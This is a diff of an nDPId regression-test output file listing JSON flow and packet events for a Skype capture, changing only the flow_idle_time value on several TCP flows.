00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -717,27 +717,27 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaTkAAEARlaPAqAEib91KKDLdnFkALS1Je7sCEGG8jv3asKVduW1KlINShpl5CYZ6daDh4AHUflFCiwcMag=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7SRAAEAGAv\/AqAEinTfrkshMnFVVB2sVAAAAALAC\/\/9GzAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5x1AAEAGCPzAqAEinTfrnMhNnFpJkZ45AAAAALAC\/\/8fDgAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMNRAAEAG8HbAqAEiQAQXn8hOnEl2PjrTAAAAALAC\/\/+HCAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABARUhAAEAGeZjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8xegAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7SRAAEAGAv\/AqAEinTfrkshMnFVVB2sVAAAAALAC\/\/9GzAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5x1AAEAGCPzAqAEinTfrnMhNnFpJkZ45AAAAALAC\/\/8fDgAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMNRAAEAG8HbAqAEiQAQXn8hOnEl2PjrTAAAAALAC\/\/+HCAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABARUhAAEAGeZjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8xegAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ToQAAEARSoLAqAEinTeCrzLdnEYAIsBye70C0WV2Jw2JJv9T381tb7aFs7ugTny6Jk4="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1431970682972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970682972,"pkt":"0NQSxnP1PBXCt3IOCABFAABBmw8AAEARYEjAqAEib91NrTLdnEwALft7e78CS2barOC4bSdle3ySCU4isieKFyYrhir3D1S\/zus1mmpuRQ=="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682972,"flow_last_seen":1431970682972,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970682972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1431970683043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683043,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIpxVyEzh8Ob8VQdrFqASOJAqmgAAAgQFrAQCCApMYN9LPjJCqwEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1431970683044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JNdAAEAGy1jAqAEinTfrkshMnFVVB2sW4fDm\/YAQECyBfAAAAQEICj4yQvNMYN9L"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1431970683053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxayE3JOyrZSZGeOqASOJDTSQAAAgQFrAQCCApMXOO6PjJCqwEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1431970683054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA01TpAAEAGGuvAqAEinTfrnMhNnFpJkZ46yTsq2oAQECwqIwAAAQEICj4yQvxMXOO6"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431970683168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683168,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIpxJyE4gX59Fdj461KASOJB7AAAAAgQFrAQCCApMR9iDPjJCqwEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431970683168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683168,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05M1AAEAGPInAqAEiQAQXn8hOnEl2PjrUIF+fRoAQECzRaAAAAQEICj4yQ21MR9iD"} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1431970683978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970683978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGihAAEAGpLjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8tkQAAAgQFtAEDAwUBAQgKPjJGlAAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1431970683043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683043,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIpxVyEzh8Ob8VQdrFqASOJAqmgAAAgQFrAQCCApMYN9LPjJCqwEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1431970683044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683044,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0JNdAAEAGy1jAqAEinTfrkshMnFVVB2sW4fDm\/YAQECyBfAAAAQEICj4yQvNMYN9L"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1431970683053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxayE3JOyrZSZGeOqASOJDTSQAAAgQFrAQCCApMXOO6PjJCqwEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1431970683054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA01TpAAEAGGuvAqAEinTfrnMhNnFpJkZ46yTsq2oAQECwqIwAAAQEICj4yQvxMXOO6"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431970683168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683168,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIpxJyE4gX59Fdj461KASOJB7AAAAAgQFrAQCCApMR9iDPjJCqwEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431970683168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683168,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05M1AAEAGPInAqAEiQAQXn8hOnEl2PjrUIF+fRoAQECzRaAAAAQEICj4yQ21MR9iD"} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1431970683978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970683978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGihAAEAGpLjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8tkQAAAgQFtAEDAwUBAQgKPjJGlAAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8i9IAAEARpC3AqAEinTfrrzLdnFcAKG0ve8ECvWqBesxtVN\/+FF8A8FJFXO0bTxFAGhtLbx9IUYU="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -747,23 +747,23 @@ 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PqwAAEARIpXAqAEiQAQXqjLdnEsAIM3ke8UC93ejJq9SbNcOBlZBFwBC35pf1nt9"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 